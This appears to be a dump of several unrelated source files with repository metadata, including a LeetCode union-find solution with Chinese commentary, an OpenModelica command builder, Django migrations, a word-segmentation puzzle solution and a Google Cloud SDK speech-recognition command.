https://leetcode.com/problems/couples-holding-hands/discuss/822501/Python-99-DFS-SCC
下面我们来看一种使用联合查找Union Find的解法。该解法对于处理群组问题时非常有效,比如岛屿数量有关的题就经常使用UF解法。核心思想是用一个root数组,每个点开始初始化为不同的值,如果两个点属于相同的组,就将其中一个点的root值赋值为另一个点的位置,这样只要是相同组里的两点,通过find函数会得到相同的值。 那么如果总共有n个数字,则共有 n/2 对儿,所以我们初始化 n/2 个群组,我们还是每次处理两个数字。每个数字除以2就是其群组号,那么属于同一组的两个数的群组号是相同的,比如2和3,其分别除以2均得到1,所以其组号均为1。那么这对解题有啥作用呢?作用忒大了,由于我们每次取的是两个数,且计算其群组号,并调用find函数,那么如果这两个数的群组号相同,那么find函数必然会返回同样的值,我们不用做什么额外动作,因为本身就是一对儿。如果两个数不是一对儿,那么其群组号必然不同,在二者没有归为一组之前,调用find函数返回的值就不同,此时我们将二者归为一组,并且cnt自减1,忘说了,cnt初始化为总群组数,即 n/2。那么最终cnt减少的个数就是交换的步数,还是用上面讲解中的例子来说明吧:
[3 1 4 0 2 5]
最开始的群组关系是:
群组0:0,1
群组1:2,3
群组2:4,5
取出前两个数字3和1,其群组号分别为1和0,带入find函数返回不同值,则此时将群组0和群组1链接起来,变成一个群组,则此时只有两个群组了,cnt自减1,变为了2。
群组0 & 1:0,1,2,3
群组2:4,5
此时取出4和0,其群组号分别为2和0,带入find函数返回不同值,则此时将群组0 & 1和群组2链接起来,变成一个超大群组,cnt自减1,变为了1
群组0 & 1 & 2:0,1,2,3,4,5
此时取出最后两个数2和5,其群组号分别为1和2,因为此时都是一个大组内的了,带入find函数返回相同的值,不做任何处理。最终交换的步数就是cnt减少值
"""
class UnionFind:
    """Disjoint-set (union-find) structure used by LC 765 (Couples Holding Hands).

    ``count`` starts at ``n // 2`` because the caller allocates one slot per
    person but only ever unions *couple ids* (``person // 2``), so at most the
    first ``n // 2`` slots are used. Every union that merges two previously
    separate groups decrements ``count`` by one.
    """

    def __init__(self, n):
        # Each element starts as the root of its own singleton set.
        self.parent = [i for i in range(n)]
        self.count = n // 2

    def find(self, i):
        """Return the root of ``i``'s set.

        Applies path compression: every node visited on the way up is
        re-pointed directly at the root, so repeated lookups on long chains
        become near-O(1) instead of O(depth) (the original recursion walked
        the full chain on every call and could hit the recursion limit).
        The returned root is identical to the uncompressed version.
        """
        if self.parent[i] != i:
            self.parent[i] = self.find(self.parent[i])
        return self.parent[i]

    def union(self, i, j):
        """Merge the sets containing ``i`` and ``j``.

        A no-op when they already share a root; otherwise links one root to
        the other and decrements ``count``.
        """
        x = self.find(i)
        y = self.find(j)
        if x != y:
            self.count -= 1
            self.parent[x] = y
class Solution:
    def minSwapsCouples(self, row) -> int:
        """Minimum adjacent swaps so every couple sits together.

        Couple id of person ``p`` is ``p // 2``. Unite the two couple ids
        sharing each sofa (consecutive index pair); each merge of two
        previously separate groups costs exactly one swap, so the answer is
        (total couples) - (groups remaining).
        """
        seats = len(row)
        groups = UnionFind(seats)
        seat = 0
        while seat < seats:
            groups.union(row[seat] // 2, row[seat + 1] // 2)
            seat += 2
        return seats // 2 - groups.count
"""
[3, 2, 0, 1]
1 1 0 0
row = [0, 2, 1, 3]
0 1 0 1
"""
| [
"taocheng984@gmail.com"
] | taocheng984@gmail.com |
247b93c47254775bb6f5dca6bdf3424e935aedbb | 14e2732db8f51176cc6394b4967868dd41b0ea97 | /src/inout/modelica/InitModelOMC.py | 91d3555d781d92aacbef5ab4a42e08efab7dd070 | [] | no_license | fran-jo/EngineSSE | 0c29db6db71499425738b22bb617f95e606f5b2e | 0878947aefb68f5e13d2cefd2dee2ef5e293f4d8 | refs/heads/master | 2020-03-23T21:02:40.605127 | 2018-07-23T23:11:42 | 2018-07-23T23:11:42 | 142,077,897 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,653 | py | '''
Created on 11 apr 2014
@author: fragom
'''
class InitModelOMC(object):
'''
classdocs
'''
def __init__(self):
'''
Constructor
'''
def loadFile(self, _path, _model):
strcommand = []
strcommand.append('loadFile(')
strcommand.append('"')
strcommand.append(_path)
strcommand.append(_model)
strcommand.append('"')
strcommand.append(')')
command = ''.join(strcommand)
command = command.replace('\\','/')
print 'loadFile: ', command
return command
def simulate(self, _model, _simOptions, _modelParams, _isParamsFile):
strcommand= []
strcommand.append('simulate(')
strcommand.append(_model)
if (_simOptions!= ''):
strcommand.append(_simOptions)
if (_isParamsFile):
strcommand.append(',simflags="-overrideFile=')
strcommand.append(_modelParams)
strcommand.append('"')
else:
strcommand.append(',simflags="-override ')
strcommand.append(_modelParams)
strcommand.append('"')
strcommand.append(')')
command = ''.join(strcommand)
command= command.replace('\\','/')
print 'simulate: ', command
return command
def plot(self, _simOutputs):
strcommand= []
strcommand.append('plot({')
for value in _simOutputs:
strcommand.append(value)
strcommand.append(',')
strcommand= strcommand[:-1]
strcommand.append('})')
command = ''.join(strcommand)
return command | [
"fran_jo@hotmail.com"
] | fran_jo@hotmail.com |
d333c66003907d386f6eee513acacbc200c7de8f | 70e047d748d503362cabc0f3ba50f3e103110ff4 | /element/migrations/0002_element_kode_element.py | 0de0334f2d46aeeaf317a647b8acefa1bc8f682a | [] | no_license | gofur/AHS | 621e7982df7c4fbd150e9427b7b408e122a38b07 | b59cba9d29e4ef5e20bf2091a646cd7ec79c3c6f | refs/heads/master | 2021-01-10T10:47:20.159642 | 2016-02-06T12:26:59 | 2016-02-06T12:26:59 | 49,955,489 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 501 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.9 on 2016-01-20 23:49
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('element', '0001_initial'),
]
operations = [
migrations.AddField(
model_name='element',
name='kode_element',
field=models.CharField(default=1, max_length=8, unique=True),
preserve_default=False,
),
]
| [
"you@example.com"
] | you@example.com |
7cfd21c143ab586aefa2bbe9b4d2f2e0ffe3b867 | f0d713996eb095bcdc701f3fab0a8110b8541cbb | /FWh2fGH7aRWALMf3o_12.py | 3ed8ee73f8657d5d9d71f3bacedbcaa8f51841d0 | [] | no_license | daniel-reich/turbo-robot | feda6c0523bb83ab8954b6d06302bfec5b16ebdf | a7a25c63097674c0a81675eed7e6b763785f1c41 | refs/heads/main | 2023-03-26T01:55:14.210264 | 2021-03-23T16:08:01 | 2021-03-23T16:08:01 | 350,773,815 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,341 | py | """
Create a function that takes a string (without spaces) and a word list,
cleaves the string into words based on the list, and returns the correctly
spaced version of the string (a sentence). If a section of the string is
encountered that can't be found on the word list, return `"Cleaving stalled:
Word not found"`.
### Examples
word_list = ["about", "be", "hell", "if", "is", "it", "me", "other", "outer", "people", "the", "to", "up", "where"]
cleave("ifitistobeitisuptome", word_list) ➞ "if it is to be it is up to me"
cleave("hellisotherpeople", word_list) ➞ "hell is other people"
cleave("hellisotterpeople", word_list) ➞ "Cleaving stalled: Word not found"
### Notes
Words on the `word_list` can appear more than once in the string. The
`word_list` is a reference guide, kind of like a dictionary that lists which
words are allowed.
"""
def cleave(string, lst, rec_call=False):
possible_words = []
for ref_word in lst:
if string[:min(len(string), len(ref_word))] == ref_word:
if(len(string) == len(ref_word)):
return string
possible_words.append(ref_word)
for word in possible_words:
result = cleave(string[len(word):], lst, True)
if result is not None:
return word + " " + result
return None if rec_call else "Cleaving stalled: Word not found"
| [
"daniel.reich@danielreichs-MacBook-Pro.local"
] | daniel.reich@danielreichs-MacBook-Pro.local |
fa48c0659171b8c9d8df62405784ad41278d721c | 70d4ef0863906b3ca64f986075cd35b8412b871e | /pipeline/contrib/statistics/migrations/0010_auto_20190304_1747.py | 16379222282ca52e23b319f90809bcf33b6776f6 | [
"MIT",
"BSD-3-Clause",
"BSL-1.0",
"LicenseRef-scancode-unknown-license-reference",
"Apache-2.0"
] | permissive | selinagyan/bk-sops | 72db0ac33d9c307f51769e4baa181ceb8e1b279e | 39e63e66416f688e6a3641ea8e975d414ece6b04 | refs/heads/master | 2020-05-07T16:44:33.312442 | 2019-04-11T02:09:25 | 2019-04-11T02:09:25 | 180,696,241 | 0 | 0 | null | 2019-04-11T02:07:11 | 2019-04-11T02:07:10 | null | UTF-8 | Python | false | false | 2,783 | py | # -*- coding: utf-8 -*-
"""
Tencent is pleased to support the open source community by making 蓝鲸智云PaaS平台社区版 (BlueKing PaaS Community Edition) available.
Copyright (C) 2017-2019 THL A29 Limited, a Tencent company. All rights reserved.
Licensed under the MIT License (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at
http://opensource.org/licenses/MIT
Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License.
""" # noqa
# Generated by Django 1.11.11 on 2019-03-04 09:47
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
    # Auto-generated Django migration for the pipeline statistics app:
    # updates display metadata (verbose_name) and relaxes nullability on
    # the component-execution timing columns. The escaped strings decode
    # to Chinese labels; rough meanings noted per operation.

    dependencies = [
        ('statistics', '0009_auto_20181116_1627'),
    ]

    operations = [
        # Display-name change only ("Pipeline standard plugin execution
        # data") plus default ordering by newest id; no table change.
        migrations.AlterModelOptions(
            name='componentexecutedata',
            options={'ordering': ['-id'], 'verbose_name': 'Pipeline\u6807\u51c6\u63d2\u4ef6\u6267\u884c\u6570\u636e', 'verbose_name_plural': 'Pipeline\u6807\u51c6\u63d2\u4ef6\u6267\u884c\u6570\u636e'},
        ),
        # Display-name change only ("Pipeline standard plugin reference
        # data").
        migrations.AlterModelOptions(
            name='componentintemplate',
            options={'verbose_name': 'Pipeline\u6807\u51c6\u63d2\u4ef6\u88ab\u5f15\u7528\u6570\u636e', 'verbose_name_plural': 'Pipeline\u6807\u51c6\u63d2\u4ef6\u88ab\u5f15\u7528\u6570\u636e'},
        ),
        # Execution end time ("plugin execution finish time") becomes
        # nullable/blankable.
        migrations.AlterField(
            model_name='componentexecutedata',
            name='archived_time',
            field=models.DateTimeField(blank=True, null=True, verbose_name='\u6807\u51c6\u63d2\u4ef6\u6267\u884c\u7ed3\u675f\u65f6\u95f4'),
        ),
        # Elapsed seconds ("plugin execution elapsed time (s)") becomes
        # nullable/blankable.
        migrations.AlterField(
            model_name='componentexecutedata',
            name='elapsed_time',
            field=models.IntegerField(blank=True, null=True, verbose_name='\u6807\u51c6\u63d2\u4ef6\u6267\u884c\u8017\u65f6(s)'),
        ),
        # Execution start time ("plugin execution start time"); remains
        # required.
        migrations.AlterField(
            model_name='componentexecutedata',
            name='started_time',
            field=models.DateTimeField(verbose_name='\u6807\u51c6\u63d2\u4ef6\u6267\u884c\u5f00\u59cb\u65f6\u95f4'),
        ),
        # Rename display label of the plugin-total counter ("standard
        # plugin total") on both statistics models.
        migrations.AlterField(
            model_name='instanceinpipeline',
            name='atom_total',
            field=models.IntegerField(verbose_name='\u6807\u51c6\u63d2\u4ef6\u603b\u6570'),
        ),
        migrations.AlterField(
            model_name='templateinpipeline',
            name='atom_total',
            field=models.IntegerField(verbose_name='\u6807\u51c6\u63d2\u4ef6\u603b\u6570'),
        ),
    ]
| [
"pagezhou@tencent.com"
] | pagezhou@tencent.com |
fa284fc48436ccf4f4208b3acd8ddd6f678c9cb3 | bc9f66258575dd5c8f36f5ad3d9dfdcb3670897d | /lib/surface/ml/speech/recognize.py | c88df1addbeabd4903e6f394417536ac17cee4ab | [
"Apache-2.0",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | google-cloud-sdk-unofficial/google-cloud-sdk | 05fbb473d629195f25887fc5bfaa712f2cbc0a24 | 392abf004b16203030e6efd2f0af24db7c8d669e | refs/heads/master | 2023-08-31T05:40:41.317697 | 2023-08-23T18:23:16 | 2023-08-23T18:23:16 | 335,182,594 | 9 | 2 | NOASSERTION | 2022-10-29T20:49:13 | 2021-02-02T05:47:30 | Python | UTF-8 | Python | false | false | 4,369 | py | # -*- coding: utf-8 -*- #
# Copyright 2022 Google LLC. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Recognize speech in provided audio."""
from __future__ import absolute_import
from __future__ import division
from __future__ import unicode_literals
from googlecloudsdk.api_lib.util import apis
from googlecloudsdk.calliope import base
from googlecloudsdk.command_lib.ml.speech import flags
from googlecloudsdk.command_lib.ml.speech import util
@base.ReleaseTracks(base.ReleaseTrack.GA)
class RecognizeGA(base.Command):
  """Get transcripts of short (less than 60 seconds) audio from an audio file."""

  detailed_help = {
      'DESCRIPTION':
          """\
Get a transcript of an audio file that is less than 60 seconds. You can use
an audio file that is on your local drive or a Google Cloud Storage URL.

If the audio is longer than 60 seconds, you will get an error. Please use
`{parent_command} recognize-long-running` instead.
""",
      'EXAMPLES':
          """\
To get a transcript of an audio file 'my-recording.wav':

    $ {command} 'my-recording.wav' --language-code=en-US

To get a transcript of an audio file in bucket 'gs://bucket/myaudio' with a
custom sampling rate and encoding that uses hints and filters profanity:

    $ {command} 'gs://bucket/myaudio' \\
        --language-code=es-ES --sample-rate=2200 --hints=Bueno \\
        --encoding=OGG_OPUS --filter-profanity
""",
      'API REFERENCE':
          """\
This command uses the speech/v1 API. The full documentation for this API
can be found at: https://cloud.google.com/speech-to-text/docs/quickstart-protocol
"""
  }

  API_VERSION = 'v1'

  flags_mapper = flags.RecognizeArgsToRequestMapper()

  @classmethod
  def Args(cls, parser):
    parser.display_info.AddFormat('json')
    cls.flags_mapper.AddRecognizeArgsToParser(parser, cls.API_VERSION)

  def MakeRequest(self, args, messages):
    """Build the RecognizeRequest message from the parsed arguments."""
    audio = util.GetRecognitionAudioFromPath(args.audio, self.API_VERSION)
    config = self.flags_mapper.MakeRecognitionConfig(args, messages)
    return messages.RecognizeRequest(audio=audio, config=config)

  def Run(self, args):
    """Run 'ml speech recognize'.

    Args:
      args: argparse.Namespace, The arguments that this command was invoked
        with.

    Returns:
      The synchronous recognition response from the Speech API.
    """
    speech_client = apis.GetClientInstance(util.SPEECH_API, self.API_VERSION)
    # Stored on self so Epilog can surface the STT UI link afterwards.
    self._request = self.MakeRequest(args, speech_client.MESSAGES_MODULE)
    return speech_client.speech.Recognize(self._request)

  def Epilog(self, unused_resources_were_displayed):
    util.MaybePrintSttUiLink(self._request)
@base.ReleaseTracks(base.ReleaseTrack.BETA)
class RecognizeBeta(RecognizeGA):
  __doc__ = RecognizeGA.__doc__

  # Copy so the module-level 'API REFERENCE' override below does not
  # mutate the GA track's help text.
  detailed_help = RecognizeGA.detailed_help.copy()

  API_VERSION = 'v1p1beta1'

  @classmethod
  def Args(cls, parser):
    super(RecognizeBeta, RecognizeBeta).Args(parser)
    cls.flags_mapper.AddBetaRecognizeArgsToParser(parser)

  def MakeRequest(self, args, messages):
    """Extend the GA request with the beta-only recognition settings."""
    recognize_request = super(RecognizeBeta, self).MakeRequest(args, messages)
    self.flags_mapper.UpdateBetaArgsInRecognitionConfig(
        args, recognize_request.config)
    return recognize_request
# The beta track talks to the v1p1beta1 surface, so replace the inherited
# 'API REFERENCE' help section (detailed_help was copy()'d on the class,
# so this does not affect RecognizeGA).
RecognizeBeta.detailed_help['API REFERENCE'] = """\
This command uses the speech/v1p1beta1 API. The full documentation for this API
can be found at: https://cloud.google.com/speech-to-text/docs/quickstart-protocol
"""
@base.ReleaseTracks(base.ReleaseTrack.ALPHA)
class RecognizeAlpha(RecognizeBeta):
  __doc__ = RecognizeBeta.__doc__

  API_VERSION = 'v1p1beta1'

  @classmethod
  def Args(cls, parser):
    super(RecognizeAlpha, RecognizeAlpha).Args(parser)
    cls.flags_mapper.AddAlphaRecognizeArgsToParser(parser, cls.API_VERSION)

  def MakeRequest(self, args, messages):
    """Extend the beta request with the alpha-only recognition settings."""
    recognize_request = super(RecognizeAlpha, self).MakeRequest(args, messages)
    self.flags_mapper.UpdateAlphaArgsInRecognitionConfig(
        args, recognize_request.config)
    return recognize_request
| [
"cloudsdk.mirror@gmail.com"
] | cloudsdk.mirror@gmail.com |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.